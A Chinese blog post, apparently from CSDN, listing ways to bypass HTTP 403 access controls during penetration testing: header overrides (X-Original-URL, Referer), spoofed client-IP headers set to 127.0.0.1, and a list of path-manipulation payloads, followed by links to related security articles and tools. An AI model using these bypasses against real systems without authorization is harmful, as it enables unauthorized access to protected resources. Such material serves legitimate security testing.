渗透测试 403绕过~~~满满的干货

最新推荐文章于 2024-03-26 13:51:48 发布
最新推荐文章于 2024-03-26 13:51:48 发布
阅读量276 收藏 5
点赞数 9
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59919573/article/details/135953982
版权

1、请求覆盖绕过

  1. 可以通过X-Original-URL 和 X-Rewrite-URL请求表头覆盖url中的路径,尝试绕过对更高级别的缓存和web服务器的限制

  2. Request
GET /ylaq/Good HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /ylaq/Good
Response
HTTP/1.1 200 OK

2、Referer表头绕过

  1. 可以通过更改Referer来绕过不严谨的服务端验证

  2. Request
GET /ylaq/Good HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/ylaq/Good
Response
HTTP/1.1 200 OK

3、代理ip

  1. 在Reqeust包中也会包含有我们的IP来源信息,有的资源只允许它本机或者内网IP进行访问,这个时候我们就可以通过使用代理IP来绕过这一限制。

  2. X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1

4、请求路径绕过

  1. 如果我们直接去访问/ylaq/Good这个目录可能是403Forbidden,那么我们可以尝试在后面加个‘/’,即访问/ylaq/Good/,有可能成功绕过,下面整理了一些常用的绕过情况。

  2. 
ylaq.com/Good => 403
ylaq.com/Good/ => 200
ylaq.com/Good// => 200
ylaq.com//Good// => 200
ylaq.com/Good/* => 200
ylaq.com/Good/*/ => 200
ylaq.com/Good/. => 200
ylaq.com/Good/./ => 200
ylaq.com/./Good/./ => 200
ylaq.com/Good/./. => 200
ylaq.com/Good/./. => 200
ylaq.com/Good? => 200
ylaq.com/Good?? => 200
ylaq.com/Good??? => 200
ylaq.com/Good..;/ => 200
ylaq.com/Good/..;/ => 200
ylaq.com/%2f/Good => 200
ylaq.com/%2e/Good => 200
ylaq.com/Good%20/ => 200
ylaq.com/Good%09/ => 200
ylaq.com/%20Good%20/ => 200
富川�
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
干货满满!盘点77条STM32知识,千万不能错过
01-20
1、  SYSCLK时钟源有三个:HSI RC、HSE OSC、PLL   2、  MCO[2:0]可以提供4源不同的时钟同步信号,PA8   3、  GPIO口有两个反向串联的二极管用作钳位二极管。   4、  ICode总线,DCode总线、系统总线、DMA总线、总线矩阵、AHB/APB桥   5、在使用一个外设之前,必须设置寄存器RCC_AHBENR来打开该外设的时钟   6、 STM32复位有三种:系统复位、上电复位、备份区域复位。其中系统复位除了RCC_CSR中的复位标志和BKP中的数值不复位之外,其他的所有寄存器全部
个人准备渗透测试安全面试的经验之谈,和去部分厂商的面试题,干货真的满满~.zip
10-22
个人准备渗透测试安全面试的经验之谈,和去部分厂商的面试题,干货真的满满~.zip
渗透测试403绕过思路
qq_45087791的博客
03-26 200
在目录扫描的时候发现一些403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。
2023HVV日记(第1-15天)
Nolen_Alice的博客
08-11 3099
记录一下HVV的一些个人收获
2021年总结:缘起性空,归来不少年——回顾这荆棘的一年
热门推荐
杨秀璋的专栏
01-05 3万+
2021年已经离去,感谢大家的陪伴和帮助,感谢家人的鼓励。转眼,这已是我在CSDN写下的第九篇年终总结,真是岁月如梭。《缘起性空,归来不少年》。是啊,归来不再少年,我已经是而立之年了。当我写下这几个字的时候,心里还沉甸甸的。曾经的我总以为,博士毕业继续回到贵州教书,陪伴家人,仍是少年,真的如此吗?或许现实将更加残忍,岁月将不饶人,这荆棘一年让我意识到,我已为人父,不再少年。
web安全性测试用例(输入、输出、SQL注入、跨站请求伪造(CSRF)、跨站脚本攻击(XSS))实实在在的干货
HemingwayM的博客
03-06 4181
https://www.cnblogs.com/qmfsun/p/3724406.html 建立整体的威胁模型,测试溢出漏洞、信息泄漏、错误处理、SQL注入、身份验证和授权错误. 1.输入验证 客户端验证 服务器端验证(禁用脚本调试,禁用Cookies) 1.输入很大的数(如4,294,967,269),输入很小的数(负数) 2.输入超长字符,如对输入文字长度有限制,则尝试超过限制...
记一次403绕过技巧
mingyqf的博客
04-24 6799
记一次403绕过技巧 文章目录记一次403绕过技巧姿势一: 端口利用姿势二:修改HOST姿势三:覆盖请求URL姿势四:Referer标头绕过姿势五:代理IP姿势六:扩展名绕过 背景 记一次接到客户的一个需求,后台管理地址(https://xxx.xxxx.com)仅允许工作区公网出口访问,对于IP的访问限制是否存在缺陷可以绕过,外网进行访问返回403状态码。 实战 姿势一: 端口利用 拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web
【渗透实战】使用403bypasser绕过目标页面上的访问控制限制
kjuhfkicf154的博客
02-01 2306
403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。
403页面绕过
qq_63980959的博客
02-29 1418
拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web服务的8001端口,我们尝试使用8001端口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001端口,客户貌似认为这个很简单,关闭8001端口,下线业务后,让我们继续尝试后台能
手把手教你绕过403访问资源
MachineGunJoe666
07-08 3829
在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。这就意味着这里面有东西,我们只需绕过它。
一些绕过403的姿势
weixin_45253622的博客
01-16 7126
端口利用 扫描主机端口,找其它开放web服务的端口;访问其端口。 修改HOST 把host值修改为子域名或者ip来绕过。 覆盖请求 URL 尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。 Request GET /auth/login HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /auth/login Re
403bypasser:自动执行403响应代码绕过的过程
05-25
403路人 自动执行403响应代码绕过的过程 描述 我注意到许多#bugbountytips描述了如何绕过403响应代码,因此当我收集所有方法时,我发现我需要40多个请求来处理所有方法。 因此,由于我喜欢自动化,因此我创建了此工具来完成繁重的工作。 但我也建议您稍后需要手动检查 该工具使用三种技术尝试绕过403响应代码,并在彩色输出中给出每次重试的响应代码,以便于阅读: 1-使用多种请求方法(GET-POST- HEAD等) 2-在URL的末尾使用多个有效负载(鸣叫这些提示的人表示敬意) 3-将标头添加到请求(X-Forwarded-Host,X-Host ...等) 安装 : 1- git clone 2 CD 403旁路 3- pip3 install -r requirements.txt 用法 该工具带有两个参数:url-路径 python3 403bypasser.p
BypassSuper:绕过403或401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
BurpSuite_403Bypasser:Burpsuite扩展程序绕过403受限制的目录
03-11
403章 一个burpsuite扩展名,用于绕过403受限制的目录。 通过使用PassiveScan(默认启用),此扩展名将自动扫描每个403请求,因此只需添加到burpsuite中即可。 有效负载:$ 1:HOSTNAME $ 2:PATH $1/$2 $1/./$2 $1/$2/. $1//$2// $1/./$2/./ $1/$2anything -H "X-Original-URL: /$2" $1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" $1 -H "X-Rewrite-URL: /$2" $1/$2 -H "Referer: /$2" $1/$2 -H "X-Originating-IP: 127.0.0.1" $1/$2 -H "X-Forwarded-For: 127.0.0.1" $1/$2 -H "X-Re
满满的干货:O2O用户体验设计
02-26
有人说“站在风口上,猪都能飞起来”;有人说“工作是为了更好的生活,如果工作都是吃喝玩乐,那就完美了”;有人说“想事情容易,做事情难,线下太多把控不了的东西”;似乎O2O触手可及,又掌控不住;...
大厂App测试实践干货分享
08-03
大厂App测试实践干货分享
渗透笔记
时光途径
06-11 3313
0x00 前言 本实验是一次非常深入彻底的模拟渗透,虽然只针对一台服务器,但却经历了从最初的获取网站管理员账号密码,到获得网站的 webshell,最后到通过提权获得服务器系统最高权限的完整渗透过程。 从实验手册上给出的工具提示也能看出,本次渗透会用到目录扫描工具、注入工具、getshell 工具、提权工具等,可谓干货满满。若各位能亲自动手尝试所有能用到的工具,把整个渗透流程实现一遍,所有知识...
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
24个已知403绕过方法的利用脚本
weixin_51725318的博客
02-29 583
24个已知403绕过方法的利用脚本
金融系统渗透测试用例
最新发布
04-27
金融系统渗透测试是为了评估金融机构的网络和应用程序的安全性而进行的测试。以下是一些常见的金融系统渗透测试用例: 1. 身份验证绕过:测试是否存在身份验证绕过漏洞,例如弱密码、默认凭证或未经授权的访问。 2. SQL注入:测试是否存在对数据库进行恶意操作的漏洞,例如通过恶意输入执行未经授权的SQL查询。 3. XSS攻击:测试是否存在跨站脚本攻击漏洞,例如在网页中插入恶意脚本以获取用户敏感信息。 4. CSRF攻击:测试是否存在跨站请求伪造漏洞,例如通过伪造请求执行未经授权的操作。 5. 文件上传漏洞:测试是否存在对上传文件进行恶意操作的漏洞,例如上传恶意文件或绕过文件类型限制。 6. 逻辑漏洞:测试是否存在逻辑错误或不一致的情况,例如绕过交易限制或越权访问。 7. 信息泄露:测试是否存在敏感信息泄露的漏洞,例如通过错误配置或弱安全措施导致敏感数据泄露。 8. DDOS攻击:测试系统的抗DDoS攻击能力,例如模拟大量请求以测试系统的性能和稳定性。 9. 漏洞扫描:使用自动化工具扫描系统,检测已知的漏洞和安全弱点。 10. 社会工程学攻击:测试是否存在通过欺骗、钓鱼或其他方式获取敏感信息的漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值